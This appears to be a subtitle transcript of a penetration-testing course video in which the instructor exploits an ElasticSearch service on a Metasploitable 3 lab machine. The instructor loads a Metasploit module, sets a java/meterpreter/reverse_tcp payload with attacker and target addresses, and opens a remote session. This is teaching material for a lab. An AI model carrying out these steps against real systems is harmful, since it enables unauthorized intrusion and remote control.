1
00:00:00,300 --> 00:00:06,180
So let's list the services again to choose one. Way too many.

2
00:00:06,330 --> 00:00:09,630
So let's just list the Metasploitable 3 services.

3
00:00:11,690 --> 00:00:16,460
All right, so let's just list HTTP-related vulnerabilities.

4
00:00:20,970 --> 00:00:24,390
And sort them according to port number.

5
00:00:26,420 --> 00:00:30,930
Right, so here are some HTTP services on the different ports.

6
00:00:31,530 --> 00:00:34,970
Now I'm going to plan on looking for many of them.

7
00:00:36,090 --> 00:00:45,240
But first, I'll start with the ElasticSearch service, so let's copy the service name with its version

8
00:00:45,240 --> 00:00:49,260
number to check the Internet to see if there's a vulnerability.

9
00:00:50,590 --> 00:00:52,780
Right, so just open your browser and

10
00:00:53,830 --> 00:00:55,210
paste it in the address bar.

11
00:00:56,280 --> 00:00:56,730
Now.

12
00:00:58,030 --> 00:01:01,330
If you're seeing what I'm seeing, the Rapid7 site comes up first.

13
00:01:02,620 --> 00:01:08,020
And I'll abandon the search for any additional information, but you can go ahead and read some of the

14
00:01:08,020 --> 00:01:09,640
articles for this vulnerability.

15
00:01:11,300 --> 00:01:16,040
And this is the module name that you will see and we will use.

16
00:01:17,300 --> 00:01:21,890
Now, you can also search ElasticSearch as a phrase in Metasploit.

17
00:01:22,780 --> 00:01:31,330
And I'll reiterate that there's not a right or wrong here, it's just about whatever suits your strategy.

18
00:01:32,380 --> 00:01:32,710
All right.

19
00:01:32,710 --> 00:01:34,420
So copy the name.

20
00:01:36,390 --> 00:01:37,980
Minimize the browser window.

21
00:01:40,500 --> 00:01:43,950
Type use and then paste the name of the module.

22
00:01:45,890 --> 00:01:51,650
Show me the options and let's have a look at the payloads too.

23
00:01:53,980 --> 00:01:56,020
All right, so set payload to

24
00:01:58,890 --> 00:02:03,000
java/meterpreter/reverse_tcp.

25
00:02:04,230 --> 00:02:05,660
Show me the options.

26
00:02:06,980 --> 00:02:19,460
OK, set RHOST to 10.10.2.10, set LHOST to 10.10.2.11.

27
00:02:20,850 --> 00:02:22,350
And I think everything's OK.

28
00:02:23,680 --> 00:02:27,400
So let me show the missing variables.

29
00:02:30,560 --> 00:02:34,940
And there are no missing variables, right, so I can run the module.

30
00:02:35,840 --> 00:02:37,490
Or exploit.

31
00:02:40,290 --> 00:02:46,950
Another Meterpreter session has also opened, so who am I? getuid.

32
00:02:48,440 --> 00:02:49,570
Where am I?

33
00:02:50,600 --> 00:02:51,530
sysinfo.

34
00:02:53,170 --> 00:02:59,020
And I'll stay at this stage so that I can send the session to the background.

35
00:03:00,040 --> 00:03:00,880
Sessions.

36
00:03:02,740 --> 00:03:06,160
And these are the sessions that are on Metasploitable 3.

37
00:03:07,290 --> 00:03:10,920
Rebecca Dimino, let's dig into some of the other services.